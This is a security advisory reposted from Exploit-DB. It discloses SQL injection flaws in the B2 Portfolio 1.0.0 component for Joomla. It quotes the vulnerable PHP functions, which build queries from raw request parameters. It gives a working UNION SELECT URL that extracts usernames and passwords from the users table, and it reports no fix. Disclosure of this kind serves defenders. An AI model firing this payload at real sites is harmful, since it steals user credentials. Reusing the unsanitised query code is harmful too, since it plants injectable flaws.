Joomla! Component com_b2portfolio 1.0.0 – Multiple SQL Injections

• Exploit Database
• 116 阅读

• 作者： Salvatore Fresta
  日期： 2011-01-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/16039/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92

  B2 Portfolio Joomla Component 1.0.0 Multiple SQL Injection Vulnerability   NameB2 Portfolio Vendorhttp://www.pulseextensions.com Versions Affected 1.0.0   AuthorSalvatore Fresta aka Drosophila Website http://www.salvatorefresta.net Contact salvatorefresta [at] gmail [dot] com Date2011-01-24   X. INDEX   I.ABOUT THE APPLICATION II. DESCRIPTION III.ANALYSIS IV. SAMPLE CODE V.FIX   I. ABOUT THE APPLICATION ________________________   B2 Portfolio is a Joomla component to give theuserthe option to view details of a portfolio item by zoomingit on hover, and to allow a full view by clicking.     II. DESCRIPTION _______________   Some parameters are not properly sanitisedbeforebeing used in SQL queries.     III. ANALYSIS _____________   Summary:   A) Multiple SQL Injection   A) Multiple SQL Injection _________________________   Idandwallidparametersarenotproperly sanitised before being used in SQL queries. Thiscanbe exploited to manipulate SQL queries by injecting arbitrary SQL code.   The following are the vulnerable functions:   function getcategoryname() { $db =& JFactory::getDBO(); $default_category = JRequest::getVar('c',0); if($default_category == "") { $query_cat = 'SELECT default_category FROM #__b2portfolio_config'; $db->setQuery( $query_cat ); $default_category = $db->loadResult(); }   $query = 'SELECT * FROM #__b2portfolio_category where id='.$default_category; $db->setQuery( $query ); $cat_data =$this->_db->loadObject($query); return $cat_data; }   function click() { $db =& JFactory::getDBO(); $date =& JFactory::getDate(); $trackDate = $date->toFormat( '%Y-%m-%d' );   $query = 'UPDATE #__b2portfolio set click = ( click + 1 ) where id ='.$_GET['wallid']; $db->setQuery( $query ); $db->query(); }     IV. SAMPLE CODE _______________   A) Multiple SQL Injection   http://site/path/index.php?option=com_b2portfolio&c=-1 UNION SELECT 1,concat(username,0x34,password),3,4,5 FROM jos_users     V. FIX ______   No fix.